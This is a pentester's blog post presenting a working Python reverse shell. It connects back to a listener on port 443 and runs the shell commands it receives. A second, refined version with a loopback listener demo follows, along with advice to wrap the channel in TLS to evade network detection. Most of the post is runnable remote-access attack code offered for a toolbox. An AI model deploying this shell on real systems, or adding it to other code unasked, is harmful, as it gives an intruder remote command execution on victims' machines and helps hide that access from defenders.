This week I decided to put together a basic Python reverse shell. The main purpose of this was to act like a meterpreter/nc reverse shell while being more customizable and (hopefully) harder to detect.
While this is just a simple reverse shell that connects back to a single listener (for example, a netcat listener), it demonstrates how little code Python needs to open a connection with sockets and run commands with subprocess. Additionally, it gives me something to build on in the future.
To start, the code is as follows:
```python
import socket
import subprocess
import sys

RHOST = "192.168.1.29"   # listener address (the attacker's host)
RPORT = 443              # listener port; 443 blends in with outbound HTTPS

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

while True:
    data = s.recv(1024)
    if not data:                     # listener closed the connection
        break
    cmd = data.decode().strip()
    if cmd == "exit":
        break
    conn = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    STDOUT, STDERR = conn.communicate()
    s.send(STDOUT + STDERR)          # return stderr too, so failed commands show

s.close()                            # reachable now that the loop can end
sys.exit(0)
```
And here is the client in action!
There are some tweaks that could be made for better persistence and error handling, but those are not necessary for the current basic operation.
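To show the exchange from both ends, here is an added example (my own code, not the shell from the post above) that puts the command handler in a function, frames each command as one newline-terminated line, stops cleanly when the listener hangs up, and runs the listener side in-process over 127.0.0.1 so it can be exercised without netcat. It assumes a POSIX shell for the sample commands and uses a free port chosen by the OS instead of the 443 in the post.

```python
import socket
import subprocess
import threading

# ---- shell side: runs on the target and connects back --------------------

def run_command(cmd: str) -> bytes:
    """Run one shell command and return stdout and stderr merged.

    Merging the streams keeps error text visible instead of returning an
    empty reply. stdin is /dev/null so a command that reads input cannot
    hang the command loop.
    """
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL)
    out, _ = proc.communicate()
    return out


def shell_client(rhost: str, rport: int) -> int:
    """Connect to the listener and serve newline-terminated commands.

    Stops on "exit" or when the listener closes the socket (recv() returns
    b""). Returns how many commands were executed.
    """
    executed = 0
    buf = b""
    with socket.create_connection((rhost, rport)) as s:
        while True:
            chunk = s.recv(4096)
            if not chunk:               # peer closed: leave instead of spinning
                return executed
            buf += chunk
            while b"\n" in buf:         # handle every complete line received
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return executed
                if cmd:
                    # sendall() retries partial writes; send() may not.
                    # An empty result still sends a newline so the listener
                    # always gets a reply.
                    s.sendall(run_command(cmd) or b"\n")
                    executed += 1


# ---- listener side: the role netcat plays, here in Python for a loopback run

def loopback_demo(commands):
    """Run listener and client against each other on 127.0.0.1.

    Returns (replies, executed): the decoded reply to each command and the
    client's own count, so the two sides can be cross-checked.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: the OS picks a free port
    srv.listen(1)
    srv.settimeout(10)
    port = srv.getsockname()[1]

    result = {}
    t = threading.Thread(
        target=lambda: result.update(n=shell_client("127.0.0.1", port)))
    t.start()

    conn, _ = srv.accept()
    replies = []
    with conn:
        conn.settimeout(10)
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            # One recv() per reply is fine for short output on loopback; real
            # tooling would length-prefix replies so long output is not split.
            replies.append(conn.recv(65536).decode(errors="replace"))
        conn.sendall(b"exit\n")
    t.join(10)
    srv.close()
    return replies, result.get("n")


if __name__ == "__main__":
    print(loopback_demo(["echo hello", "echo err 1>&2", "id"]))
```

One thing worth keeping in mind about the "harder to detect" goal: both this example and the shell above speak plain TCP, so even on port 443 the commands and their output cross the wire in cleartext, and a network sensor that checks for a TLS handshake on 443 will flag the session immediately. Wrapping the socket in TLS is the obvious next step on that front.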
That said, this is a great start for a reverse shell, and something I needed to add to my toolbox anyway.
The next major steps for this shell are as follows:
The code and updates can be found in my GitHub repository.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.